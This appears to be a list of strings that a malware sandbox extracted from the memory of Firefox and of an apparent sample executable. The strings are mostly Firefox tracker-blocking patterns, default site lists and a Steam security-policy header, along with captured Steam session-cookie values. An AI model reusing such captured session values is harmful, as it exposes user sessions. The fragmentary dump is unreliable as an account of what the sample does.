Source: firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2146450702.000001C965782000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlUpdateService:_postUpdateProcessing - status is pending-elevate, but this is a silent startup, so the elevation window has been suppressed.You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/MAX(EXISTS( equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://*.imgur.com/js/vendor.*.bundle.js@mozilla.org/network/atomic-file-output-stream;1resource://gre/modules/FileUtils.sys.mjs*://track.adform.net/serving/scripts/trackpoint/FileUtils_openAtomicFileOutputStream*://www.rva311.com/static/js/main.*.chunk.js@mozilla.org/network/safe-file-output-stream;1*://www.everestjs.net/static/st.v3.js**://pub.doubleverify.com/signals/pub.js*@mozilla.org/network/file-output-stream;1*://static.chartbeat.com/js/chartbeat.jsresource://gre/modules/addons/XPIProvider.jsmwebcompat-reporter%40mozilla.org:1.5.1FileUtils_closeSafeFileOutputStream*://cdn.branch.io/branch-latest.min.js**://c.amazon-adsystem.com/aax2/apstag.jshttps://smartblock.firefox.etp/facebook.svg*://static.chartbeat.com/js/chartbeat_video.js*://static.criteo.net/js/ld/publishertag.js*://*.imgur.io/js/vendor.*.bundle.js*://web-assets.toggl.com/app/assets/scripts/*.js*://libs.coremetrics.com/eluminate.js*://auth.9c9media.ca/auth/main.js*://www.google-analytics.com/analytics.js**://www.googletagmanager.com/gtm.js**://www.google-analytics.com/plugins/ua/ec.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://www.googletagservices.com/tag/js/gpt.js**://pagead2.googlesyndication.com/tag/js/gpt.js**://s0.2mdn.net/instream/html5/ima3.js*://cdn.adsafeprotected.com/iasPET.1.js*://static.adsafeprotected.com/iasPET.1.js*://www.google-analytics.com/gtm/js**://adservex.media.net/videoAds.js**://cdn.optimizely.com/public/*.js*://*.vidible.tv/*/vidible-min.js**://ssl.google-analytics.com/ga.js*://s.webtrends.com/js/advancedLinkTracking.js*://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://s.webtrends.com/js/webtrends.js*://s.webtrends.com/js/webtrends.min.jsresource://gre/modules/AsyncShutdown.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://securepubads.g.doubleclick.net/gampad/*ad-blk**://securepubads.g.doubleclick.net/gampad/*xml_vmap1*https://static.adsafeprotected.com/firefox-etp-pixel*://id.rambler.ru/rambler-id-helper/auth_events.jshttps://static.adsafeprotected.com/firefox-etp-jscolor-mix(in srgb, currentColor 14%, transparent)*://media.richrelevance.com/rrserver/js/1.2/p13n.js*://www.gstatic.com/firebasejs/*/firebase-messaging.js*resource://gre/modules/ExtensionScriptingStore.sys.mjs equals www.rambler.ru (Rambler)
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.c3a9 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2303891585.000001C96F71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F76E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F751000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2300171636.000001C96F503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2286214238.000001C96F2B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F76E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2229257788.000001C968F3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C9679EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2229257788.000001C968FAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba24e9977faccad43253; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=7b60d4c5eefaf9e8532fcfae; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26105Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveThu, 24 Oct 2024 02:02:09 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdgeUpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyRestartOnLastWindowClosed.#maybeRestartBrowser - Unexpectedly attempted to restart when RestartOnLastWindowClosed ought to be disabled! (not restarting)moz-extension://2a8a4ba3-32a0-495a-bbc2-63871e7b7005/lib/messaging_helper.jsTrue if the "Variant 2" of the Migration Wizard browser / profile selection UI should be used. This is only meaningful in the new Migration Wizard.[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "responseHeaders"]]moz-extension://2aec2d48-9127-47e3-8a78-71ba3773e451/selector/callBackground.jsmoz-extension://2a8a4ba3-32a0-495a-bbc2-63871e7b7005/lib/custom_functions.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdgeUpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyRestartOnLastWindowClosed.#maybeRestartBrowser - Unexpectedly attempted to restart when RestartOnLastWindowClosed ought to be disabled! (not restarting)moz-extension://2a8a4ba3-32a0-495a-bbc2-63871e7b7005/lib/messaging_helper.jsTrue if the "Variant 2" of the Migration Wizard browser / profile selection UI should be used. This is only meaningful in the new Migration Wizard.[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "responseHeaders"]]moz-extension://2aec2d48-9127-47e3-8a78-71ba3773e451/selector/callBackground.jsmoz-extension://2a8a4ba3-32a0-495a-bbc2-63871e7b7005/lib/custom_functions.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdgeUpdateService:_selectAndInstallUpdate - the user is unable to apply updates... prompting. Notifying observers. topic: update-available, status: cant-applyRestartOnLastWindowClosed.#maybeRestartBrowser - Unexpectedly attempted to restart when RestartOnLastWindowClosed ought to be disabled! (not restarting)moz-extension://2a8a4ba3-32a0-495a-bbc2-63871e7b7005/lib/messaging_helper.jsTrue if the "Variant 2" of the Migration Wizard browser / profile selection UI should be used. This is only meaningful in the new Migration Wizard.[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "responseHeaders"]]moz-extension://2aec2d48-9127-47e3-8a78-71ba3773e451/selector/callBackground.jsmoz-extension://2a8a4ba3-32a0-495a-bbc2-63871e7b7005/lib/custom_functions.jshttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E09000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963461000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963461000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2175868045.000001C968391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2175868045.000001C968391000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: captcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: color-mix(in srgb, currentColor 9%, transparent)*://*.adsafeprotected.com/*/imp/**://www.facebook.com/platform/impression.php*color-mix(in srgb, currentColor 9%, transparent)*://ads.stickyadstv.com/user-matching*--autocomplete-popup-separator-color--panel-banner-item-update-supported-bgcolor*://vast.adsafeprotected.com/vast*extensions.geckoProfiler.acceptedExtensionIds equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: current application version: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: current application version: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: current application version: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
